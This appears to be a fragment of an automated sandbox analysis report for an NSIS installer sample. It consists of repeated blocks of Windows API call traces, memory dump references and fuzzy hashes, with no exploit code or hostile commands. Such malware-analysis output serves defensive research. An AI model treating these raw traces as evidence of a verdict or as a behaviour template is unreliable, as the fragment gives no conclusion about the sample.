• Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalFree.KERNELBASE(00000000), ref: 00401BE7
                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00004004), ref: 00401BF9
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                              • String ID: InetHelper
                                                                                                                                                                                                              • API String ID: 3394109436-2767297512
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00405A14: ShellExecuteExW.SHELL32(?), ref: 00405A23
                                                                                                                                                                                                                • Part of subcall function 00406873: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406884
                                                                                                                                                                                                                • Part of subcall function 00406873: GetExitCodeProcess.KERNEL32(?,?), ref: 004068A6
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401F4D
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ChangeCloseCodeExecuteExitFindNotificationObjectProcessShellSingleWait
                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              • API String ID: 4215836453-2766056989
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,004266D0,timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this,0040345A,0040A230,0040A230,0040335E,004266D0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this, xrefs: 00405F61
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                              • String ID: timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this
                                                                                                                                                                                                              • API String ID: 2738559852-1897978588
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00423D35,timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this,004033DE,timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this,00423D35,004266D0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this, xrefs: 00405F90
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                                                                              • String ID: timings}get isFromCache(){return this[Re]}pipe(m,f){if(this[At])throw new Error("Failed to pipe. The response has been emitted already.");return m instanceof a.ServerResponse&&this[fe].add(m),super.pipe(m,f)}unpipe(m){return m instanceof a.ServerResponse&&this
                                                                                                                                                                                                              • API String ID: 3934441357-1897978588
                                                                                                                                                                                                              • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                              • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,0045A730,?,00405DDC,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0,00000000), ref: 00405D76
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                • Part of subcall function 0040591F: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,004C9000,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1892508949-0
                                                                                                                                                                                                              • Opcode ID: 080c4fbc0bac1be490202287ae91035c68ce5d17b61444efa9045488ae083b02
                                                                                                                                                                                                              • Instruction ID: 7d59cd0ba42eeb9d64297a1bfc0940e3ae1e5cc226c4bbb5031ea1960038836b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 080c4fbc0bac1be490202287ae91035c68ce5d17b61444efa9045488ae083b02
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8811D031904510EBCF30AFA5CD4599E36A0EF15329B28493BFA45B22F1DB3E8D819A5D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00002000,00403576,00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(?,?,0045A730,?,00405DDC,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0,00000000), ref: 00405D76
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                                                                                                                • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                                                                                                              • lstrlenW.KERNEL32(0045A730,00000000,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0,00000000), ref: 00405E1E
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(0045A730,0045A730,0045A730,0045A730,0045A730,0045A730,00000000,0045A730,0045A730,004D5000,?,74DF2EE0,00405B1A,?,004D5000,74DF2EE0), ref: 00405E2E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3248276644-0
                                                                                                                                                                                                              • Opcode ID: c50f70bfe3bb78425b78202ba545a0a687f676b53d1ab77a34f5d173cef1449b
                                                                                                                                                                                                              • Instruction ID: 388cf340d0c034ef08ff27084220079457182ac4682ba574f5a4b5e3d5e6accd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c50f70bfe3bb78425b78202ba545a0a687f676b53d1ab77a34f5d173cef1449b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFF0F43A005E1116D62233364D09BEF0948CE82314B1A853BFC91B22D2DB3C8A539DFE
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                              • Opcode ID: 8c309843f6b2f335838841955cb70ff663a93de2c7e640db2f5b87053db46705
                                                                                                                                                                                                              • Instruction ID: b0acf179c18152fd5568b60ba426e70b62ff0895eecaeb6bac654bfa50895d4e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c309843f6b2f335838841955cb70ff663a93de2c7e640db2f5b87053db46705
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD012832620210DFE7195B789D18B2A3798E710718F10467FF955F62F1EA78CC429B4D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                                • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                                                                                                                • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                                                                                                                                • Part of subcall function 00406752: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067B8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2547128583-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00402F73,004DD000,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 415043291-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405ABE,?,?,00000000,00405C94,?,?,?,?), ref: 00405EBE
                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405ED2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403498,004D5000,004D5000,004D5000,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,74DF3420,00403819,00000006,?,00000006,00000008,0000000A), ref: 004039F8
                                                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,74DF3420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A0C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                                • Part of subcall function 004059D1: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0045E730,Error launching installer), ref: 004059FA
                                                                                                                                                                                                                • Part of subcall function 004059D1: CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401F4D
                                                                                                                                                                                                                • Part of subcall function 00406873: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406884
                                                                                                                                                                                                                • Part of subcall function 00406873: GetExitCodeProcess.KERNEL32(?,?), ref: 004068A6
                                                                                                                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$CloseProcesslstrlen$ChangeCodeCreateExitFindHandleNotificationObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1543427666-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                                                                                                                                • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 004058B7
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00405912
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
